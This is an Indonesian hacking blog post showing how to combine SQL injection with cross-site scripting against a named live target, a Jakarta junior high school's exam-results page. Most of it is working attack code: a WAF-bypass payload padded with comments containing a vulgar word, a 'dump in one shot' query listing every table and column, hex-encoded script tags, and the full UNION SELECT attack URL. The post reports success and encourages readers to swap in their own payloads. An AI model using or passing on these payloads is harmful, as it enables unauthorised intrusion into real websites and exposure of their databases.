-
Hai sobat
Saya ikal,
Disini saya akan sharing sesuatu nih.
-
Sesuai judul kita kali ini, kita akan membahas bagaimana cara melakukan XSS in SQL Injection atau SQL Injection to XSS.
Langsung saja.
Live target :
http://smp162jakarta.com/Pengumuman-Kelulusan/cetaksk.php?noujian=02-0103-0001-8
seperti biasa kalian lakukan injeksi SQL biasa. dan saya anggap kalian sudah mendapatkan angka togel dari target kalian. Lanjut kita buat DIOS (Dump In One Shoot) untuk melakukan SQL Injection to XSS atau XSS in SQL Injection.
Disitu
kita di beri angka hampir semuanya bisa di gunain. Misal disini
saya akan menggunakan angka 3, angka paling atas dan paling pertama saya
lirik. Kita
buat dulu code XSS nya lalu encode dan bungkus dengan concat. Karena
website nya mempunyai waf maka kita bypass aja sekalian.
concat/*kontol*//**kontol**/(<script>alert('Injected By 1K4lL_* | ,(select(@x)/*!50000from/**kontol**/*/(/*!50000select/**kontol**/*/(@x:=0x00),(select(0)/*!From/**kontol**/*/(/*!50000information_schema.columns/**kontol**/*/)/*!50000where/**kontol**/*/(table_schema=database/*kontol*//**kontol*/())and(0x00)in(@x:=/*!50000coNcat/**kontol**/*/(@x,0x3c6c693e,/*!50000table_name/**kontol**/*/,0x3a3a,/*!50000column_name/**kontol**/*/))))x),');</script>)
Lalu bagaimana mengconvert nya? Apakah semua nya di convert atau di encode menjadi hex? tidak.
Bagian-bagian
yang di convert atau di encode menjadi hex hanyalah bagian yang bukan
perintah SQL atau apalah. setiap encode di batasi dengan tanda koma (,)
agar terbaca oleh server. Dan di beri 0x sebelum encode an nya.
Contoh bagian yang di encode :
1).<script>alert('Injected By 1K4lL_* |
Encode menjadi hex :
0x3c7363726970743e616c6572742827496e6a656374656420427920314b346c4c5f2a207cc2a0
2).');</script>
Encode menjadi hex :
0x27293b3c2f7363726970743e
Dan mari kita satukan,
concat/*kontol*//**kontol**/(0x3c7363726970743e616c6572742827496e6a656374656420427920314b346c4c5f2a207cc2a0,(select(@x)/*!50000from/**kontol**/*/(/*!50000select/**kontol**/*/(@x:=0x00),(select(0)/*!From/**kontol**/*/(/*!50000information_schema.columns/**kontol**/*/)/*!50000where/**kontol**/*/(table_schema=database/*kontol*//**kontol*/())and(0x00)in(@x:=/*!50000coNcat/**kontol**/*/(@x,0x3c6c693e,/*!50000table_name/**kontol**/*/,0x3a3a,/*!50000column_name/**kontol**/*/))))x),0x27293b3c2f7363726970743e)
Lalu kita taruh di angka togel, seperti yang tadi saya bilang saya ingin menempelkannya di angka 3.
http://smp162jakarta.com/Pengumuman-Kelulusan/cetaksk.php?noujian=02-0103-0001-8%27%20and%200%20/*!50000%55nion*/%20/*!50000%53elect*/%201,2,concat/*kontol*//**kontol**/(0x3c7363726970743e616c6572742827496e6a656374656420427920314b346c4c5f2a207cc2a0,(select(@x)/*!50000from/**kontol**/*/(/*!50000select/**kontol**/*/(@x:=0x00),(select(0)/*!From/**kontol**/*/(/*!50000information_schema.columns/**kontol**/*/)/*!50000where/**kontol**/*/(table_schema=database/*kontol*//**kontol*/())and(0x00)in(@x:=/*!50000coNcat/**kontol**/*/(@x,0x3c6c693e,/*!50000table_name/**kontol**/*/,0x3a3a,/*!50000column_name/**kontol**/*/))))x),0x27293b3c2f7363726970743e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--%20-
dan taraa... berhasil :D.Selanjutnya kalian bisa memodifikasi sendiri payloadnya dengan payload kalian masing masing.
Referensi :
Thanks
See U
Hai sobat, Saya ikal. Disini kalian bisa learning mengenai sesuatu dari setiap artikel yang saya buat :D.
Belum ada Komentar untuk "SQL Injection to XSS"
Posting Komentar